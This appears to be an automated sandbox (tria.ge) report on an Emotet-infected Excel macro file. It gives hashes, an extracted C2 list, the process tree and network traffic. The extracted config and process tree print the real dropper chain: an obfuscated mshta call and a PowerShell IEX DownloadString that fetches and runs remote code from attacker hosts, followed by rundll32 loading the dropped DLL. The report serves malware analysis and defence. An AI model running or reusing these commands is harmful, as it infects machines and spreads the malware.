Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    152s
  • max time network
    148s
  • platform
    windows10_x64
  • resource
    win10-en-20211208
  • submitted
    19/01/2022, 23:54 UTC

General

  • Target

    b9510c284bf2350a71ff66a248c97768d98b4e04146ade4a28fd9f1fab9137c3.xlsm

  • Size

    115KB

  • MD5

    ae463a7f0de640061802d78223d7424d

  • SHA1

    d4809b8d5b09ede52d07f27485ed5d54bb7e4eca

  • SHA256

    b9510c284bf2350a71ff66a248c97768d98b4e04146ade4a28fd9f1fab9137c3

  • SHA512

    ea7ab3c0d5641711e0600dac4c1bf6bcd9035715b529360d7027a1e64ae963b958b8b70d890dc027487cf138b3eb92862cb69a9875f34216e64a8a1facee2758

Malware Config

Extracted

Language
hta
Source
1
mshta http://0x5cff39c3/sec/se1.html
URLs
hta.dropper

http://0x5cff39c3/sec/se1.html

Extracted

Language
ps1
Deobfuscated
1
# powershell snippet 0
2
$c1 = "(New-Object Net.We"
3
$c4 = "bClient).Downlo"
4
$c3 = "adString('http://92.255.57.195/sec/se1.png')"
5
$ji = "(New-Object Net.WebClient).DownloadString('http://92.255.57.195/sec/se1.png')"
6
invoke-expression "(New-Object Net.WebClient).DownloadString('http://92.255.57.195/sec/se1.png')"|invoke-expression
7
8
# powershell snippet 1
9
(new-object net.webclient).downloadstring("http://92.255.57.195/sec/se1.png")
10
URLs
ps1.dropper

http://92.255.57.195/sec/se1.png

Extracted

Family

emotet

Botnet

Epoch5

C2

45.138.98.34:80

69.16.218.101:8080

51.210.242.234:8080

185.148.168.220:8080

142.4.219.173:8080

54.38.242.185:443

191.252.103.16:80

104.131.62.48:8080

62.171.178.147:8080

217.182.143.207:443

168.197.250.14:80

37.44.244.177:8080

66.42.57.149:443

210.57.209.142:8080

159.69.237.188:443

116.124.128.206:8080

128.199.192.135:8080

195.154.146.35:443

185.148.168.15:8080

195.77.239.39:8080

eck1.plain
1
-----BEGIN PUBLIC KEY-----
2
MFkwEwYHKoZIzj0CAQYIKoZIzj0DAQcDQgAE2DWT12OLUMXfzeFp+bE2AJubVDsW
3
NqJdRC6yODDYRzYuuNL0i2rI2Ex6RUQaBvqPOL7a+wCWnIQszh42gCRQlg==
4
-----END PUBLIC KEY-----
ecs1.plain
1
-----BEGIN PUBLIC KEY-----
2
MFkwEwYHKoZIzj0CAQYIKoZIzj0DAQcDQgAE9C8agzYaJ1GMJPLKqOyFrlJZUXVI
3
lAZwAnOq6JrEKHtWCQ+8CHuAIXqmKH6WRbnDw1wmdM/YvqKFH36nqC2VNA==
4
-----END PUBLIC KEY-----

Signatures

  • Emotet

    Emotet is a trojan that is primarily spread through spam emails.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • suricata: ET MALWARE W32/Emotet CnC Beacon 3

    suricata: ET MALWARE W32/Emotet CnC Beacon 3

  • Blocklisted process makes network request 5 IoCs
  • Downloads MZ/PE file
  • Loads dropped DLL 2 IoCs
  • Drops file in System32 directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 1 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 19 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 20 IoCs
  • Suspicious use of WriteProcessMemory 22 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\b9510c284bf2350a71ff66a248c97768d98b4e04146ade4a28fd9f1fab9137c3.xlsm"
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2464
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:2104
      • C:\Windows\SYSTEM32\cmd.exe
        cmd /c m^sh^t^a h^tt^p^:/^/0x5cff39c3/sec/se1.html
        2⤵
        • Process spawned unexpected child process
        • Suspicious use of WriteProcessMemory
        PID:2264
        • C:\Windows\system32\mshta.exe
          mshta http://0x5cff39c3/sec/se1.html
          3⤵
          • Blocklisted process makes network request
          • Suspicious use of WriteProcessMemory
          PID:3664
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({GOOGLE}{GOOGLE}Ne{GOOGLE}{GOOGLE}w{GOOGLE}-Obj{GOOGLE}ec{GOOGLE}{GOOGLE}t N{GOOGLE}{GOOGLE}et{GOOGLE}.W{GOOGLE}{GOOGLE}e'.replace('{GOOGLE}', ''); $c4='bC{GOOGLE}li{GOOGLE}{GOOGLE}en{GOOGLE}{GOOGLE}t).D{GOOGLE}{GOOGLE}ow{GOOGLE}{GOOGLE}nl{GOOGLE}{GOOGLE}{GOOGLE}o'.replace('{GOOGLE}', ''); $c3='ad{GOOGLE}{GOOGLE}St{GOOGLE}rin{GOOGLE}{GOOGLE}g{GOOGLE}(''ht{GOOGLE}tp{GOOGLE}://92.255.57.195/sec/se1.png'')'.replace('{GOOGLE}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
            4⤵
            • Blocklisted process makes network request
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:1328
            • C:\Windows\system32\cmd.exe
              "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\Users\Public\Documents\ssd.dll,AnyString
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:3396
              • C:\Windows\SysWow64\rundll32.exe
                C:\Windows\SysWow64\rundll32.exe C:\Users\Public\Documents\ssd.dll,AnyString
                6⤵
                • Loads dropped DLL
                • Suspicious use of WriteProcessMemory
                PID:2952
                • C:\Windows\SysWOW64\rundll32.exe
                  C:\Windows\SysWOW64\rundll32.exe "C:\Users\Public\Documents\ssd.dll",DllRegisterServer
                  7⤵
                  • Loads dropped DLL
                  • Drops file in System32 directory
                  • Suspicious use of WriteProcessMemory
                  PID:1756
                  • C:\Windows\SysWOW64\rundll32.exe
                    C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Xokaozvpqz\pvsqulbvuplvj.fnj",AIrvNFjwTIczp
                    8⤵
                    • Suspicious use of WriteProcessMemory
                    PID:680
                    • C:\Windows\SysWOW64\rundll32.exe
                      C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Xokaozvpqz\pvsqulbvuplvj.fnj",DllRegisterServer
                      9⤵
                      • Blocklisted process makes network request
                      • Suspicious behavior: EnumeratesProcesses
                      PID:3032
          • C:\Windows\system32\WerFault.exe
            C:\Windows\system32\WerFault.exe -u -p 3664 -s 1636
            4⤵
            • Program crash
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2256

    Network

    • flag-ru
      GET
      http://92.255.57.195/sec/se1.html
      mshta.exe
      Remote address:
      92.255.57.195:80
      Request
      GET /sec/se1.html HTTP/1.1
      Accept: */*
      Accept-Language: en-US
      UA-CPU: AMD64
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: 92.255.57.195
      Connection: Keep-Alive
      Response
      HTTP/1.1 200 OK
      Date: Wed, 19 Jan 2022 23:54:52 GMT
      Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
      Last-Modified: Wed, 19 Jan 2022 18:29:09 GMT
      ETag: "2adf-5d5f38fbf4740"
      Accept-Ranges: bytes
      Content-Length: 10975
      Keep-Alive: timeout=5, max=100
      Connection: Keep-Alive
      Content-Type: text/html
    • flag-ru
      GET
      http://92.255.57.195/sec/se1.png
      powershell.exe
      Remote address:
      92.255.57.195:80
      Request
      GET /sec/se1.png HTTP/1.1
      Host: 92.255.57.195
      Connection: Keep-Alive
      Response
      HTTP/1.1 200 OK
      Date: Wed, 19 Jan 2022 23:54:54 GMT
      Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
      Last-Modified: Wed, 19 Jan 2022 18:27:22 GMT
      ETag: "430-5d5f3895e9680"
      Accept-Ranges: bytes
      Content-Length: 1072
      Keep-Alive: timeout=5, max=100
      Connection: Keep-Alive
      Content-Type: image/png
    • flag-us
      DNS
      seven-lines.com
      powershell.exe
      Remote address:
      8.8.8.8:53
      Request
      seven-lines.com
      IN A
      Response
      seven-lines.com
      IN A
      178.208.83.22
    • flag-nl
      GET
      http://seven-lines.com/wp-includes/QEGNF4XUSR2Ps/
      powershell.exe
      Remote address:
      178.208.83.22:80
      Request
      GET /wp-includes/QEGNF4XUSR2Ps/ HTTP/1.1
      Host: seven-lines.com
      Connection: Keep-Alive
      Response
      HTTP/1.1 200 OK
      Server: nginx
      Date: Wed, 19 Jan 2022 23:54:55 GMT
      Content-Type: application/x-msdownload
      Content-Length: 616448
      Connection: keep-alive
      Keep-Alive: timeout=5
      X-Powered-By: PHP/5.6.37
      Cache-Control: no-cache, must-revalidate
      Pragma: no-cache
      Expires: Wed, 19 Jan 2022 23:54:55 GMT
      Content-Disposition: attachment; filename="YdL2KCVPV8.dll"
      Content-Transfer-Encoding: binary
      Set-Cookie: 61e8a4cf14e00=1642636495; expires=Wed, 19-Jan-2022 23:55:55 GMT; Max-Age=60; path=/
      Last-Modified: Wed, 19 Jan 2022 23:54:55 GMT
    • flag-us
      GET
      https://69.16.218.101:8080/PtdzEgctxefTHbqGmgxSrBjIUuvZd
      rundll32.exe
      Remote address:
      69.16.218.101:8080
      Request
      GET /PtdzEgctxefTHbqGmgxSrBjIUuvZd HTTP/1.1
      Cookie: cvPrOubDezBxMbD=FRqjaRBofmcFnxoj3abmLU5mJCGtPw5BCK2kLof4OKPkkASzOXIKB+UsN7MA1eyLETIutVYBCTPKm5i5RzGRkLhXHPyPF8pftEkS8mUvhCpfqLK7htjcdYUpr0aG2ODGBhJKL/TJ1eS+XhdYypOiuzXVsneB5YbfMxK8FWeyegCYly/dvcZx+g+yllzZaemmXArjIuWddfaoKpE2rTG/1qsAdr60N5KNgl+N9LInYTrtrJB2beE+qaXNqS+15mo0g14iB35/NwMxrETBgynDSsMljmNr6B32YiSDikoE
      Host: 69.16.218.101:8080
      Connection: Keep-Alive
      Cache-Control: no-cache
      Response
      HTTP/1.1 200 OK
      Server: nginx
      Date: Wed, 19 Jan 2022 23:55:13 GMT
      Content-Type: text/html; charset=UTF-8
      Transfer-Encoding: chunked
      Connection: keep-alive
    • 52.109.88.36:443
      322 B
      7
    • 52.109.88.36:443
      nexusrules.officeapps.live.com
      tls
      1.7kB
      19.5kB
      15
      17
    • 92.255.57.195:80
      http://92.255.57.195/sec/se1.html
      http
      mshta.exe
      881 B
      11.8kB
      12
      11

      HTTP Request

      GET http://92.255.57.195/sec/se1.html

      HTTP Response

      200
    • 92.255.57.195:80
      http://92.255.57.195/sec/se1.png
      http
      powershell.exe
      626 B
      1.6kB
      12
      4

      HTTP Request

      GET http://92.255.57.195/sec/se1.png

      HTTP Response

      200
    • 178.208.83.22:80
      http://seven-lines.com/wp-includes/QEGNF4XUSR2Ps/
      http
      powershell.exe
      10.3kB
      634.0kB
      223
      426

      HTTP Request

      GET http://seven-lines.com/wp-includes/QEGNF4XUSR2Ps/

      HTTP Response

      200
    • 45.138.98.34:80
      rundll32.exe
      156 B
      120 B
      3
      3
    • 69.16.218.101:8080
      https://69.16.218.101:8080/PtdzEgctxefTHbqGmgxSrBjIUuvZd
      tls, http
      rundll32.exe
      1.3kB
      2.5kB
      12
      9

      HTTP Request

      GET https://69.16.218.101:8080/PtdzEgctxefTHbqGmgxSrBjIUuvZd

      HTTP Response

      200
    • 8.8.8.8:53
      seven-lines.com
      dns
      powershell.exe
      61 B
      77 B
      1
      1

      DNS Request

      seven-lines.com

      DNS Response

      178.208.83.22

    MITRE ATT&CK Enterprise v6

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/680-340-0x0000000004BC0000-0x0000000004BE8000-memory.dmp

      Filesize

      160KB

    • memory/1328-308-0x0000020E42770000-0x0000020E42772000-memory.dmp

      Filesize

      8KB

    • memory/1328-318-0x0000020E42776000-0x0000020E42778000-memory.dmp

      Filesize

      8KB

    • memory/1328-309-0x0000020E42773000-0x0000020E42775000-memory.dmp

      Filesize

      8KB

    • memory/1328-277-0x0000020E427F0000-0x0000020E42812000-memory.dmp

      Filesize

      136KB

    • memory/1328-296-0x0000020E42960000-0x0000020E4299C000-memory.dmp

      Filesize

      240KB

    • memory/1328-307-0x0000020E42ED0000-0x0000020E42F46000-memory.dmp

      Filesize

      472KB

    • memory/1756-328-0x0000000000660000-0x0000000000688000-memory.dmp

      Filesize

      160KB

    • memory/1756-331-0x00000000045F0000-0x0000000004618000-memory.dmp

      Filesize

      160KB

    • memory/1756-339-0x00000000049B0000-0x00000000049D8000-memory.dmp

      Filesize

      160KB

    • memory/1756-337-0x0000000004850000-0x0000000004878000-memory.dmp

      Filesize

      160KB

    • memory/1756-335-0x00000000047F0000-0x0000000004818000-memory.dmp

      Filesize

      160KB

    • memory/1756-333-0x00000000046D0000-0x00000000046F8000-memory.dmp

      Filesize

      160KB

    • memory/2464-119-0x00007FFB307C0000-0x00007FFB307D0000-memory.dmp

      Filesize

      64KB

    • memory/2464-124-0x00007FFB307C0000-0x00007FFB307D0000-memory.dmp

      Filesize

      64KB

    • memory/2464-132-0x00007FFB2DC70000-0x00007FFB2DC80000-memory.dmp

      Filesize

      64KB

    • memory/2464-120-0x00007FFB307C0000-0x00007FFB307D0000-memory.dmp

      Filesize

      64KB

    • memory/2464-121-0x00007FFB307C0000-0x00007FFB307D0000-memory.dmp

      Filesize

      64KB

    • memory/2464-118-0x00007FFB307C0000-0x00007FFB307D0000-memory.dmp

      Filesize

      64KB

    • memory/2464-131-0x00007FFB2DC70000-0x00007FFB2DC80000-memory.dmp

      Filesize

      64KB

    • memory/3032-345-0x00000000050C0000-0x00000000050E8000-memory.dmp

      Filesize

      160KB

    • memory/3032-347-0x00000000051B0000-0x00000000051D8000-memory.dmp

      Filesize

      160KB

    • memory/3032-349-0x0000000005290000-0x00000000052B8000-memory.dmp

      Filesize

      160KB

    • memory/3032-351-0x0000000005370000-0x0000000005398000-memory.dmp

      Filesize

      160KB

    • memory/3032-353-0x0000000005460000-0x0000000005488000-memory.dmp

      Filesize

      160KB

    • memory/3032-355-0x0000000005560000-0x0000000005588000-memory.dmp

      Filesize

      160KB

    We care about your privacy.

    This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.